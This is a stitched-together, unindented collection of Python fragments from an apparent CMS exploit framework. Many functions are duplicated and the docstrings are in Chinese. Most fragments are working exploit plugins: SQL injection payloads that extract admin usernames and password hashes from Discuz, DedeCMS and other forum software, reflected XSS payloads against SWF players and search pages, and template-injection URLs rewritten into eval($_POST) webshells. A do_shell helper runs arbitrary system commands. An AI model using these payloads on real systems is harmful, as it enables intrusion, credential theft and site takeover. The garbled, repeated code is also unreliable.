def exploit(URL, Thread):
logger.process("Request " + URL)
r = requests.get(URL)
r.close()
if r.status_code == 200:
logger.success("200")
return "200"
def get_hash(url):
"""
获取管理 hash
:param url: 网站地址
:return: dict, 用户名及 md5
"""
logger.process("Getting manager's hash")
r = requests.post(url,
data={
"gids[99]":
"'",
"gids[100][0]":
") and (select 1 from (select count(*"
"),concat((select (select (select con"
"cat(0x7e7e7e,username,0x7e,password,"
"0x7e7e7e) from cdb_members limit 0,1"
") ) from `information_schema`.tables"
" limit 0,1),floor(rand(0)*2))x from "
"information_schema.tables group by x"
")a)#"
},
timeout=5)
r.close()
result = r.text.split("~~~")[1].split("~")
return {"username": result[0], "md5": result[1]}
def get_hash(url):
"""
获取管理 hash
:param url: 网站地址
:return: dict, 用户名及 md5
"""
logger.process("Getting manager's hash")
r = requests.post(
url,
data={
"gids[99]": "'",
"gids[100][0]": ") and (select 1 from (select count(*"
"),concat((select (select (select con"
"cat(0x7e7e7e,username,0x7e,password,"
"0x7e7e7e) from cdb_members limit 0,1"
") ) from `information_schema`.tables"
" limit 0,1),floor(rand(0)*2))x from "
"information_schema.tables group by x"
")a)#",
},
timeout=5,
)
r.close()
result = r.text.split("~~~")[1].split("~")
return {"username": result[0], "md5": result[1]}
def exploit(URL, Thread):
logger.process("Request "+URL)
r = requests.get(URL)
r.close()
if r.status_code == 200:
logger.success("200")
return "200"
def do_rebuild_db(self, line):
"""
重建数据库
:return:
"""
logger.process("Clear current database")
logger.process("Rebuild database")
self.db_rebuild()
logger.success("OK")
def exploit(URL):
logger.process("Requesting target site")
try:
result=verify(URL)
logger.success("Username: %s" % result[0])
logger.success("password: %s" % result[1])
return "%s: %s|%s" % (URL, result[0], result[1])
except:
pass
def do_rebuild_db(self, line):
"""
重建数据库
:return:
"""
logger.process("Clear current database")
logger.process("Rebuild database")
self.db_rebuild()
logger.success("OK")
def do_shell(self, arg):
"""
执行系统命令
:param arg:
:return:
"""
logger.process("exec: %s" % arg)
sub_cmd = subprocess.Popen(arg, shell=True, stdout=subprocess.PIPE)
print
print sub_cmd.communicate()[0],
def do_shell(self, arg):
"""
执行系统命令
:param arg:
:return:
"""
logger.process("exec: %s" % arg)
sub_cmd = subprocess.Popen(arg, shell=True, stdout=subprocess.PIPE)
print
print sub_cmd.communicate()[0],
def exploit(URL):
url = URL + "/static/image/common/flvplayer.swf?file=1.flv&" \
"linkfromdisplay=true&link=javascript:alert(1);"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if hashlib.md5(r.content).hexdigest() == "7d675405ff7c94fa899784b7ccae68d3":
logger.success("Exploitable!")
logger.success(url)
return url
def exploit(URL):
url=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a"
logger.process("Requesting target site")
verify(URL)
try:
result=get_hash(url)
logger.success("Username: %s" % result[0])
logger.success("password: %s" % result[1])
return "%s: %s|%s" % (URL, result[0], result[1])
except:
pass
def exploit(URL):
url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
"?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
"rt%281%29;//"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if hashlib.md5(r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
logger.success("Exploitable!")
logger.success(url)
return url
def exploit(URL):
url = URL + "/index.php/Index/index/name/${@phpinfo()}"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "<title>phpinfo()</title>" in r.text:
logger.success("Exploitable!")
logger.success("Phpinfo: %s" % url)
url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
logger.success("Webshell: %s" % url)
return url
def exploit(URL):
url = URL + "/index.php/Index/index/name/${@phpinfo()}"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "<title>phpinfo()</title>" in r.text:
logger.success("Exploitable!")
logger.success("Phpinfo: %s" % url)
url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
logger.success("Webshell: %s" % url)
return url
def exploit(URL):
url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
"?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
"rt%281%29;//"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if hashlib.md5(
r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
logger.success("Exploitable!")
logger.success(url)
return url
def exploit(URL):
url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \
r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \
r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \
r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \
r"\\x69\\x70\\x74\\x3e"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "</title><script>alert(document.domain)</script>" in r.text:
logger.success("Exploitable!")
logger.success(url)
return url
def exploit(URL):
url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \
r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \
r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \
r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \
r"\\x69\\x70\\x74\\x3e"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "</title><script>alert(document.domain)</script>" in r.text:
logger.success("Exploitable!")
logger.success(url)
return url
def exploit(URL, Cookie):
logger.process("Requesting " + URL)
url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
"%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
"password,0x68616e64736f6d65636875),5%20from%20et_users%23"
r = requests.get(url=url, cookies=Cookie, timeout=5)
r.close()
if "handsomechu" in r.text:
logger.success("Exploitable!")
handsomechu = r.text.split("handsomechu")[1].split("~~~")
username, password = handsomechu
logger.success("Username: %s" % username)
logger.success("Hash: %s" % password)
return "%s: %s|%s" % (URL, username, password)
def exploit(URL):
url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \
"(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \
"e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \
"- &sitesearch=http://127.0.0.1/startbbs/"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "chuishere" in r.text:
logger.success("Exploitable!")
username, md5 = r.text.split("~~~")[1].split("~")
logger.success("Username: %s" % username)
logger.success("Hash: %s" % md5)
return "%s: %s|%s" % (URL, username, md5)
def exploit(URL):
url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \
"(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \
"e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \
"- &sitesearch=http://127.0.0.1/startbbs/"
logger.process("Requesting target site")
r = requests.get(url, timeout=5)
r.close()
if "chuishere" in r.text:
logger.success("Exploitable!")
username, md5 = r.text.split("~~~")[1].split("~")
logger.success("Username: %s" % username)
logger.success("Hash: %s" % md5)
return "%s: %s|%s" % (URL, username, md5)
def exploit(URL, Cookie):
logger.process("Requesting " + URL)
url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
"16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
"36f6d65636875)%20from%20et_users%20limit%201,1%23"
r = requests.get(url=url, cookies=Cookie, timeout=5)
r.close()
if "handsomechu" in r.text:
logger.success("Exploitable!")
handsomechu = r.text.split("handsomechu")[1].split("~~~")
username, password = handsomechu
logger.success("Username: %s" % username)
logger.success("Hash: %s" % password)
return "%s: %s|%s" % (URL, username, password)
def exploit(URL):
urls = [
URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
]
for i, url in zip(range(1, 3), urls):
logger.process("Testing URL %d..." % i)
r = requests.get(url, timeout=5)
r.close()
if "<title>phpinfo()</title>" in r.text:
logger.success("Exploitable!")
logger.success("Phpinfo: %s" % url)
url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
logger.success("WebShell: %s" % url)
return url
def exploit(URL):
urls = [
URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D"
]
for i, url in zip(range(1, 3), urls):
logger.process("Testing URL %d..." % i)
r = requests.get(url, timeout=5)
r.close()
if "<title>phpinfo()</title>" in r.text:
logger.success("Exploitable!")
logger.success("Phpinfo: %s" % url)
url = url.replace("%24%7B%40phpinfo%28%29%7D",
"%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
logger.success("WebShell: %s" % url)
return url
def exploit(URL, Cookie):
logger.process("Requesting "+URL)
url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
"%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
"password,0x68616e64736f6d65636875),5%20from%20et_users%23"
r = requests.get(
url=url,
cookies=Cookie,
timeout=5
)
r.close()
if "handsomechu" in r.text:
logger.success("Exploitable!")
handsomechu = r.text.split("handsomechu")[1].split("~~~")
username, password = handsomechu
logger.success("Username: %s" % username)
logger.success("Hash: %s" % password)
return "%s: %s|%s" % (URL, username, password)
def exploit(URL, Cookie):
logger.process("Requesting "+URL)
url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
"16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
"36f6d65636875)%20from%20et_users%20limit%201,1%23"
r = requests.get(
url=url,
cookies=Cookie,
timeout=5
)
r.close()
if "handsomechu" in r.text:
logger.success("Exploitable!")
handsomechu = r.text.split("handsomechu")[1].split("~~~")
username, password = handsomechu
logger.success("Username: %s" % username)
logger.success("Hash: %s" % password)
return "%s: %s|%s" % (URL, username, password)
def verify(url):
"""
判断是否存在注入
:param url: 网站地址
:return: bool
"""
logger.process("Requesting target site")
r = requests.post(url,
data={
"gids[99]":
"'",
"gids[100][0]":
") and (select 1 from (select count(*"
"),concat(version(),floor(rand(0)*2))"
"x from information_schema.tables gro"
"up by x)a)#"
},
timeout=5)
r.close()
if "MySQL Query Error" in r.text:
logger.success("Exploitable!")
return True
def verify(url):
"""
判断是否存在注入
:param url: 网站地址
:return: bool
"""
logger.process("Requesting target site")
r = requests.post(
url,
data={
"gids[99]": "'",
"gids[100][0]": ") and (select 1 from (select count(*"
"),concat(version(),floor(rand(0)*2))"
"x from information_schema.tables gro"
"up by x)a)#",
},
timeout=5,
)
r.close()
if "MySQL Query Error" in r.text:
logger.success("Exploitable!")
return True
def exec_plugins(self):
"""
执行所有插件
:return:
"""
logger.process("Loading Plugins")
self.load_plugins()
if self.what_web:
logger.process("Loading multi_whatweb")
self.identify_cms()
for plugin in self.plugins:
logger.process("Loading %s" % plugin)
self.load_plugin(plugin)
pool = threadpool.ThreadPool(self.thread_number)
reqs = threadpool.makeRequests(self.exec_single_plugin,
self.targets)
for req in reqs:
pool.putRequest(req)
pool.wait()
self.log_vulns()
def exec_plugins(self):
"""
执行所有插件
:return:
"""
logger.process("Loading Plugins")
self.load_plugins()
if self.what_web:
logger.process("Loading multi_whatweb")
self.identify_cms()
for plugin in self.plugins:
logger.process("Loading %s" % plugin)
self.load_plugin(plugin)
pool = threadpool.ThreadPool(self.thread_number)
reqs = threadpool.makeRequests(self.exec_single_plugin,
self.targets)
for req in reqs:
pool.putRequest(req)
pool.wait()
self.log_vulns()
def do_update(self, line):
"""
更新
:return:
"""
logger.process("")
logger.process("Attempting to update the CMS Exploit Framework")
logger.process("")
logger.process("Downloading plugin list")
remote_plugins = self.down_plugin_list()
logger.process("Getting local plugin list")
local_plugins = self.get_local_plugin_list()
logger.process("Comparing and updating")
new_plugins = self.down_plugins(remote_plugins, local_plugins)
logger.success("New plugins: %s" % str(new_plugins))
self.do_rebuild_db("")
def do_update(self, line):
"""
更新
:return:
"""
logger.process("")
logger.process("Attempting to update the CMS Exploit Framework")
logger.process("")
logger.process("Downloading plugin list")
remote_plugins = self.down_plugin_list()
logger.process("Getting local plugin list")
local_plugins = self.get_local_plugin_list()
logger.process("Comparing and updating")
new_plugins = self.down_plugins(remote_plugins, local_plugins)
logger.success("New plugins: %s" % str(new_plugins))
self.do_rebuild_db("")
def do_shell(self, arg):
logger.process("exec: %s" % arg)
sub_cmd = subprocess.Popen(arg, shell=True, stdout=subprocess.PIPE)
print
print sub_cmd.communicate()[0]
def do_rebuild_db(self, line):
logger.process("清空数据库")
logger.process("重建数据库")
self.db_rebuild()
logger.success("OK")
def do_init_db(self, line):
logger.process("初始化数据库")
self.db_init()
logger.success("OK")
